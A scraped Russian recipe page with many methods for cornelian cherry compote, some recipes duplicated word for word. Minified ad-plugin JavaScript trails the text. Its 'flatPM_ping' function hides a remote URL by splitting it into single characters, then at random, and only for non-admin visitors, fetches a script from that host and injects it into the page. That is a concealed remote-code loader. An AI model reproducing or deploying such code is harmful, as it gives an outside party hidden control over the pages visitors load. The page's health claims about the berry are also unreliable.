Кизиловый компот рецепт

Компот из кизила: лучшая подборка рецептов – как варить кизиловый компот на зиму и на каждый день в кастрюле

Кизиловый компот – это просто волшебный напиток! Яркий вкус, умопомрачительный цвет и полезный состав – вот что отличает его от других напитков, сваренных в домашних условиях. Ягода кизил полезна и вкусна – это ни для кого не секрет, но вот как из нее приготовить такой же полезный компот? В этом вопросе мы сейчас разберемся подробнейшим образом.

Какие ягоды выбрать и как их предварительно обработать

Для готовки компота требуются плоды спелые, но не перезревшие. Слишком мягкий кизил в кипятке лопнет и превратится в кашу. Природная кислота ягод может корректироваться сахаром. В данной подборке рецептов представлено соотношение продуктов для средне-кислой ягоды.

Первым делом кизил перебирают. Плодоножки удаляют, а сами ягодки внимательно осматривают, и отбраковывают подгнившие. Перебранные плоды ополаскивают проточной водой и откидывают на сито, чтобы стекла лишняя влага. Сильно обсушивать кизил не нужно. Косточки из плодов также не убирают.

Рецепты приготовления кизилового компота

В кастрюле

На плиту ставят 2,5 литра воды в кастрюле. После закипания, в воду кладут 150 грамм сахарного песка и 250 грамм ягод. Кизил при этом можно использовать как свежий, так и замороженный. Варят компот под крышкой, на среднем огне совсем не долго – 5-7 минут после повторного закипания. Готовый напиток разливают по бокалам не сразу же, а спустя часа 3-4, позволяя кизиловому компоту настояться.

Канал «Видео рецепты» представляет вашему вниманию инструкцию по приготовлению кизилового компота с грушей

В мультиварке из сушеного кизила

Три мультистакана сухих ягод кизила кладут в пятилитровую чашу мультиварки. Для агрегата с кастрюлей меньшего литража ингредиенты уменьшают пропорционально.

К ягодам добавляют 250 грамм сахара и наливают холодную воду до верхней риски чаши. Чтобы компот при варке не выбегал, расстояние до края миски должно быть 3-4 сантиметра.

Варят кизиловый напиток под крышкой на программе «Суп», «Тушение» или «Варка» в течение 1 часа. После этого устройство отключают, а крышку не открывают еще 4-5 часов.

В мультиварке компот не остынет даже через 6 часов, поэтому, чтобы снять пробу с компота, его желательно охладить с помощью кубиков льда. Технология приготовления прозрачных ледяных кубиков подробно описана в нашей статье.

Заготовка на зиму со стерилизацией

Чистые ягоды (300 грамм) перекладывают в три небольшие банки, которые были предварительно вычищены содой. Объем емкостей – 700-800 миллилитров. Кизил заливают холодной водой до верха банок, а затем жидкость сразу сливают в кастрюлю, тем самым замеряя нужный объем. Чтобы сварить сироп, на каждый слитый литр воды берут 150 грамм сахара. Как только компотная основа закипит, ее заливают в банки с ягодами.

Сверху заготовку прикрывают (именно прикрывают, а не закручивают) прогретыми в кипятке крышками. В широкую кастрюлю или металлический тазик наливают воду и устанавливают в них банки. Время стерилизации компота зависит от объема тары. Подробнее о процессе стерилизации заготовок в банках читайте тут.

Медленное остывание банок после стерилизации – залог успешной консервации. Поэтому на сутки кизиловый компот определяют под теплый плед или одеяло, а затем убирают на хранение.

Без стерилизации с двойной заливкой

Сначала готовят банки под консервацию. Их моют губкой и стерилизуют паром. О различных приемах стерилизации банок читайте здесь.

Очень удобно пользоваться трехлитровой тарой. Расчет ингредиентов мы приведем именно на такой объем компота.

Итак, на три литра напитка берут 350 грамм свежих плодов. Моют их и кладут в банки. На огне кипятят 2,5-2,7 литров воды. Крутым кипятком заливают кизил, и прикрывают банки крышками, которые стерилизовали паром или кипятком. Через 10 минут порозовевший настой сливают в кастрюлю, а банки с кизилом прикрывают крышками.

В настой добавляют 2 стакана сахара и доводят его до кипения. Полное растворение кристалликов контролируют ложкой, перемешивая сироп. Кипящим сладким раствором повторно заливают кизил. Банки сразу же закручивают или закатывают специальным ключом.

В целях поддержания максимальной температуры заготовок, банки определяют под теплое покрывало на сутки.

Канал «Готовим вместе» подготовил для вас видео-рецепт заготовки кизилового компота

Концентрированный компот

Такой напиток подойдет тем, кто баночные компоты перед употреблением разводит водой: так и ягоды используются экономнее и готового продукта получается значительно больше.

В чистую банку накладывают 400 грамм кизила и заливают его водой по самое горлышко. В пустую кастрюлю переливают содержимое банки вместе с ягодами. Добавляют полкило сахара. Компот ставят на огонь и кипятят на медленном огне 5 минут. Тем временем банку стерилизуют.

Горячий, прямо с плиты, компот переливают в подготовленную тару и сразу же закручивают его.

Простояв в тепле до полного остывания, кизиловый компот убирают в подвал или погреб.

С лимонной кислотой

Варят кизиловый компот с лимонной кислотой без стерилизации, способом двойной заливки. Смотрите рецепт выше. Меняют только количество исходных продуктов. На трехлитровую банку берут:

  • кизил — 300 грамм;
  • сахар – 1,5 стакана;
  • вода – 2,5 литра;
  • кислота лимонная – 1/3 чайной ложки.

С яблоками

В трехлитровую банку кладут стакан ягод кизила и 3 крупных яблока, разрезанных на четвертины. Семенные коробки у яблок удаляют, косточки из кизила не вынимают.

Фрукты-ягоды пересыпают сахаром (300 грамм) и заливают крутым кипятком до самого верха банки. Банку прикрывают стерильной крышкой и ставят в кастрюлю с водой для дальнейшей стерилизации. После 40 минут обработки, банки плотно закручивают и утепляют на 24 часа.

Вера Челомбитько покажет, как готовить компот из кизила, темных слив и яблок на зиму

Кроме компота из кизила можно приготовить своеобразный джем, перетерев его с сахаром. Подробности тут.

Способы хранения компота

Законсервированный на зиму кизиловый компот хранят в прохладном месте до снятия свежего урожая.

Напиток, сваренный в кастрюле, хранят в плотно закрытой банке или бутылке. Место хранения – холодильник, срок реализации – 2 дня.

Компот из кизила на зиму

Кизил ценится наравне с шиповником и лимоном. Его лечебные свойства и насыщенный витаминно-минеральный состав известны с древности. В красной кисло-сладкой ягоде очень много витамина С и фитонцидов, которые борются с вирусными заболеваниями. Кизил помогает вывести токсины, повысить гемоглобин и даже убрать изжогу при повышенной кислотности. Напитки из кизила полезны диабетикам для придания сил и снижения высокой температуры.

Кизил незаменим для иммунитета, поэтому, если вы делаете заготовки на зиму, обязательно приготовьте компот из кизила, несколько рецептов которого мы предлагаем в этой статье. Собранные ягоды переберите и удалите мягкие плоды. Готовьте спелые и плотные плоды вместе с косточкой — это придаст компоту отличные вкусовые качества. Мы рассчитали для вас продукты на банку объемом 2 л, но вы всегда можете скорректировать количество на свое усмотрение.

Компот из кизила на зиму

Ингредиенты

  • 300 г кизила
  • 150 г сахара
  • 0,5 ч. л. лимонной кислоты
  • 1,5–2 л воды

Приготовление

  1. Промойте кизил и сложите его в чистую банку объемом 1,5 л. Вскипятите воду и залейте ягоды на 15 минут, прикрыв банку крышкой.
  2. Перелейте воду из банки в кастрюлю, добавьте сахар и доведите снова до кипения. В банку с кизилом добавьте лимонную кислоту и сироп из кастрюли до самого верха. Сразу же накройте банку крышкой и закатайте.
  3. Переверните банку вверх дном, укутайте одеялом или полотенцем и дайте полностью остыть.
  4. Через 24 часа компот станет красивого насыщенного цвета и его можно будет убрать на хранение в темное прохладное место.

Компот из терна и кизила

Ингредиенты

  • 300 г терна
  • 300 г кизила
  • 250 г сахара
  • 0,5 ч. л. лимонной кислоты
  • 1,5–2,5 л воды

Приготовление

  1. Переберите все ягоды, порченые и мягкие удалите. Хорошо промойте плоды водой. Наполните стерилизованную банку кизилом и терном, добавьте лимонную кислоту и сахар.
  2. Вскипятите воду и залейте содержимое банки на 1/3 объема. Накройте крышкой и полотенцем, дайте постоять в тепле 15–20 минут.
  3. Спустя указанное время долейте кипяток до самого верха, позволив воде немного перелиться через край. Сразу же закатайте банку, поставьте вверх дном и укутайте чем-то теплым. В таком виде дайте компоту полностью остыть.

Компот из кизила и груш

Ингредиенты

  • 200 г кизила
  • 250 г груш
  • 150 г сахара
  • 0,5 ч. л. лимонной кислоты
  • 1,5–2 л воды

Приготовление

  1. Груши промойте, разрежьте на 4 части, удалите хвостики и сердцевину. Сложите в чистую стерилизованную банку груши и мытый кизил.
  2. Вскипятите воду, залейте фрукты, накройте банку крышкой и оставьте на 20 минут. Затем слейте воду, добавьте сахар, снова вскипятите и наполните банку. Перед вторым кипячением добавьте к фруктам лимонную кислоту.
  3. Накройте крышкой банку с кипяченым сиропом и закатайте ключом. Переверните емкость вверх дном, накройте пледом, одеялом или полотенцем, дайте полностью остыть и храните в условиях городской квартиры или в погребе.

Компот из кизила и ежевики

Ингредиенты

  • 300 г кизила
  • 150 г ежевики
  • 170 г сахара
  • 0,3 ч. л. лимонной кислоты
  • 1,5–2 л воды

Приготовление

  1. Хорошо промойте ягоды под проточной водой и сложите в прогретую стерилизованную банку. Добавьте сахар с лимонной кислотой.
  2. В кастрюле доведите воду до кипения и залейте ягоды до самого края горлышка. Сразу накройте крышкой, закатайте, поставьте крышкой вниз, укутайте полотенцем и в таком виде оставьте охлаждаться. Готовый компот поместите в кладовку на хранение.

Компот из кизила и персиков

Ингредиенты

  • 200 г персиков
  • 250 г кизила
  • 150 г сахара
  • 0,3 ч. л. лимонной кислоты
  • 1,5–2 л воды

Приготовление

  1. Промытые персики разрежьте на 4 части, сложите в банку вместе с мытыми ягодами кизила. Залейте фрукты кипятком, оставьте накрытую крышкой банку на 20 минут.
  2. Слейте воду, смешайте в кастрюле с сахаром и вскипятите. Прямо в банку добавьте лимонную кислоту, влейте кипящий сироп и сразу закатайте крышку. Переверните вверх дном, утеплите одеялом, оставьте остывать.

Компот из винограда и кизила

Ингредиенты

  • 250 г винограда
  • 150 г кизила
  • 100 г сахара
  • 2 л воды
  • лимон или лайм по вкусу

Приготовление

  1. Снимите виноград с гроздьев и промойте вместе с остальными фруктами. Бросьте в кипяток все ягоды.
  2. Добавьте сахар и доведите еще раз до кипения. Отрежьте ломтик лимона или лайма, положите в кастрюлю, выключите огонь, накройте крышкой и дайте компоту настояться.
  3. Остывший компот можно сразу разлить по стаканам и употреблять. Или перелейте в удобную посуду, охладите в холодильнике и пейте освежающий напиток в жаркую погоду.

Надеемся, после прочтения этой статьи у кизила появится больше поклонников. Плоды были частью здорового питания во многих странах мира на протяжении тысячелетий. Найдены упоминания давностью 7000 лет об использовании кизила в качестве продовольственной культуры в древней Греции. В современной Восточной Европе и Западной Азии компот из него до сих пор применяется как полезный фруктовый напиток.

Читать еще:  Суфле с желатином

Всё же этот исторически значимый продукт утратил популярность в индустриальную эпоху, потому что не подходит для культивации и массового производства. Продолговатые косточки в ягодах очень трудно удалить, так как они плотно прилегают к мякоти. Кроме того, плоды кизила созревают долго и требуют многократного сбора урожая. Поэтому, если на вашем участке растет кизил, не игнорируйте это уникальное растение, а непременно заготовьте хотя бы пару баночек с витаминным компотом на зиму!

Как приготовить компот из кизила на зиму

Здравствуйте, уважаемые читатели. У нас продолжается заготовка компотов, и сегодня я вам расскажу как приготовить компот из кизила на зиму. Если вы еще не пробовали такой компот, то рекомендую попробовать. Он не только вкусный, и к тому же очень полезный. Например он богат так необходимым нам витамином С, который мы ищем в заграничных продуктах, например в цитрусовых. А в кизиле есть не только этот витамин, а еще и группа полезных нам минеральных веществ, кислот, а так же глюкозы и фруктозы. Очень хорошо восстанавливает силы.

Но об этой информации мы уже писали на блоге, подробней можно прочитать в статье про полезные свойства кизила. Сегодня же будем готовить компот из кизила на зиму.

Рецепт приготовления компота из кизила

Начинается любой рецепт с выбора продуктов для него. Не исключением составляет и компот. Прежде всего нужно выбрать хороший кизил. Сейчас на рынке можно встретить разный кизил, мелкий, крупный, сладкий, кислый, формы овальной и грушевидной. Нам желательно брать, если конечно он не растет у вас на даче или дома, кизил, который не переспелый. Ведь его и мыть надо, и потом кипятком заливать. А переспелый просто подавится еще на стадии мойки.

Еще очень важное дополнение, надо брать целый, не подгнивший или подпорченный кизил. Это в дальнейшем может сказаться как на вкусе, так и на виде компота.

Кизил берем из расчета 2 стакана ягод на 3 литровую банку. Приблизительно это около 350 грамм.

Так как мы будем ягоды свежие класть в банку, то смысла стерилизовать её я не вижу. Просто беру, заливаю 0.5 литра кипятка, чтобы прогреть банку и потом сливаю воду.

Теперь в каждую банку кладу по 2 стакана ягод кизила. Количество можно изменить, все зависит от вашего вкуса. Можно просто один килограмм ягод и распределить на 3 банки, не отмерять точное количество. Я ягоды не просушивал, просто дал стечь воде и все.

Но к тому времени у вас уже должна быть горячая вода. Заливаем все это кипятком и накрываем крышкой.

Оставляем на 15 — 20 минут. За это время все ягоды прогреются, и даже немного пустят свой сок. Чем красней будет ягода, тем больше шансов на окрашивание компота.

По прошествии намеченного времени сливаем воду в кастрюлю. Это можно сделать при помощи специальной крышки, либо использовать шумовку либо обычную ложку. Я уже показывал, как это можно сделать в рецепте компота из абрикоса.

После того как слили воду, накрываем теми же крышками и отставляем в сторону банки с кизилом.

Сливаем со всех бутылей и ставим на огонь кастрюлю. В одной емкости должно быть ровное количество слитой воды. А именно с одной, двух, трех или больше банок. Это нам нужно, чтобы правильно рассчитать количество сахара.

Сахар добавляем из расчета один стакан на одну 3 литровую банку. Если у вас ягоды кислые, то можете добавить больше. Можно пробовать сироп, и уже по вкусу добавлять сахар. Ведь и сахар по сладости может быть разным.

Когда вода закипела, разливаем её обратно в банки с кизилом. Если есть помощник, то один человек разливает, а второй закатывает банку железными крышками. Если нет помощника, то можно разлить весь сироп по банкам, накрыть крышками, а затем уже закатывать.

Я делал один, поэтому так и сделал.

После закатывания ставим компот в *баню*. А именно, ставим банки вверх дном, на крышки, и укутываем теплыми вещами. Можно использовать куртку, одеяло, все что может подойти для этого. Оставляем в таком положении до полного остывания. Из опыта скажу, что это больше суток, если хорошо укутали.
А теперь хочу показать вам наши заготовки компотов. На первой фотографии я поставил все три банки в ряд, а в реальности все выглядит так. У нас есть компот из клубники, из абрикоса, из кизила, из яблок, и собираемся сделать из слив еще.

Эту волшебную ягоду мы для себя открыли около 10 лет назад, и с каждым годом все больше делаем из неё заготовок. И если соус к мясу наши дети не едят, то компот с удовольствием выпьют. Соус видно, он как раз стоит под компотом из кизила, и имеет розоватый оттенок.

Как приготовить компот из кизила на зиму вы уже знаете, постарался объяснить подробно и с фотографиями. Если возник вопрос, то напишите его в комментариях. Так же буду очень благодарен за любой комментарий, который вы оставите.

Компот из кизила на зиму

Кизил ценится наравне с шиповником и лимоном. Его лечебные свойства и насыщенный витаминно-минеральный состав известны с древности. В красной кисло-сладкой ягоде очень много витамина С и фитонцидов, которые борются с вирусными заболеваниями. Кизил помогает вывести токсины, повысить гемоглобин и даже убрать изжогу при повышенной кислотности. Напитки из кизила полезны диабетикам для придания сил и снижения высокой температуры.

Кизил незаменим для иммунитета, поэтому, если вы делаете заготовки на зиму, обязательно приготовьте компот из кизила, несколько рецептов которого мы предлагаем в этой статье. Собранные ягоды переберите и удалите мягкие плоды. Готовьте спелые и плотные плоды вместе с косточкой — это придаст компоту отличные вкусовые качества. Мы рассчитали для вас продукты на банку объемом 2 л, но вы всегда можете скорректировать количество на свое усмотрение.

Компот из кизила на зиму

Ингредиенты

  • 300 г кизила
  • 150 г сахара
  • 0,5 ч. л. лимонной кислоты
  • 1,5–2 л воды

Приготовление

  1. Промойте кизил и сложите его в чистую банку объемом 1,5 л. Вскипятите воду и залейте ягоды на 15 минут, прикрыв банку крышкой.
  2. Перелейте воду из банки в кастрюлю, добавьте сахар и доведите снова до кипения. В банку с кизилом добавьте лимонную кислоту и сироп из кастрюли до самого верха. Сразу же накройте банку крышкой и закатайте.
  3. Переверните банку вверх дном, укутайте одеялом или полотенцем и дайте полностью остыть.
  4. Через 24 часа компот станет красивого насыщенного цвета и его можно будет убрать на хранение в темное прохладное место.

Компот из терна и кизила

Ингредиенты

  • 300 г терна
  • 300 г кизила
  • 250 г сахара
  • 0,5 ч. л. лимонной кислоты
  • 1,5–2,5 л воды

Приготовление

  1. Переберите все ягоды, порченые и мягкие удалите. Хорошо промойте плоды водой. Наполните стерилизованную банку кизилом и терном, добавьте лимонную кислоту и сахар.
  2. Вскипятите воду и залейте содержимое банки на 1/3 объема. Накройте крышкой и полотенцем, дайте постоять в тепле 15–20 минут.
  3. Спустя указанное время долейте кипяток до самого верха, позволив воде немного перелиться через край. Сразу же закатайте банку, поставьте вверх дном и укутайте чем-то теплым. В таком виде дайте компоту полностью остыть.

Компот из кизила и груш

Ингредиенты

  • 200 г кизила
  • 250 г груш
  • 150 г сахара
  • 0,5 ч. л. лимонной кислоты
  • 1,5–2 л воды

Приготовление

  1. Груши промойте, разрежьте на 4 части, удалите хвостики и сердцевину. Сложите в чистую стерилизованную банку груши и мытый кизил.
  2. Вскипятите воду, залейте фрукты, накройте банку крышкой и оставьте на 20 минут. Затем слейте воду, добавьте сахар, снова вскипятите и наполните банку. Перед вторым кипячением добавьте к фруктам лимонную кислоту.
  3. Накройте крышкой банку с кипяченым сиропом и закатайте ключом. Переверните емкость вверх дном, накройте пледом, одеялом или полотенцем, дайте полностью остыть и храните в условиях городской квартиры или в погребе.

Компот из кизила и ежевики

Ингредиенты

  • 300 г кизила
  • 150 г ежевики
  • 170 г сахара
  • 0,3 ч. л. лимонной кислоты
  • 1,5–2 л воды

Приготовление

  1. Хорошо промойте ягоды под проточной водой и сложите в прогретую стерилизованную банку. Добавьте сахар с лимонной кислотой.
  2. В кастрюле доведите воду до кипения и залейте ягоды до самого края горлышка. Сразу накройте крышкой, закатайте, поставьте крышкой вниз, укутайте полотенцем и в таком виде оставьте охлаждаться. Готовый компот поместите в кладовку на хранение.

Компот из кизила и персиков

Ингредиенты

  • 200 г персиков
  • 250 г кизила
  • 150 г сахара
  • 0,3 ч. л. лимонной кислоты
  • 1,5–2 л воды

Приготовление

  1. Промытые персики разрежьте на 4 части, сложите в банку вместе с мытыми ягодами кизила. Залейте фрукты кипятком, оставьте накрытую крышкой банку на 20 минут.
  2. Слейте воду, смешайте в кастрюле с сахаром и вскипятите. Прямо в банку добавьте лимонную кислоту, влейте кипящий сироп и сразу закатайте крышку. Переверните вверх дном, утеплите одеялом, оставьте остывать.

Компот из винограда и кизила

Ингредиенты

  • 250 г винограда
  • 150 г кизила
  • 100 г сахара
  • 2 л воды
  • лимон или лайм по вкусу

Приготовление

  1. Снимите виноград с гроздьев и промойте вместе с остальными фруктами. Бросьте в кипяток все ягоды.
  2. Добавьте сахар и доведите еще раз до кипения. Отрежьте ломтик лимона или лайма, положите в кастрюлю, выключите огонь, накройте крышкой и дайте компоту настояться.
  3. Остывший компот можно сразу разлить по стаканам и употреблять. Или перелейте в удобную посуду, охладите в холодильнике и пейте освежающий напиток в жаркую погоду.

Надеемся, после прочтения этой статьи у кизила появится больше поклонников. Плоды были частью здорового питания во многих странах мира на протяжении тысячелетий. Найдены упоминания давностью 7000 лет об использовании кизила в качестве продовольственной культуры в древней Греции. В современной Восточной Европе и Западной Азии компот из него до сих пор применяется как полезный фруктовый напиток.

Всё же этот исторически значимый продукт утратил популярность в индустриальную эпоху, потому что не подходит для культивации и массового производства. Продолговатые косточки в ягодах очень трудно удалить, так как они плотно прилегают к мякоти. Кроме того, плоды кизила созревают долго и требуют многократного сбора урожая. Поэтому, если на вашем участке растет кизил, не игнорируйте это уникальное растение, а непременно заготовьте хотя бы пару баночек с витаминным компотом на зиму!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};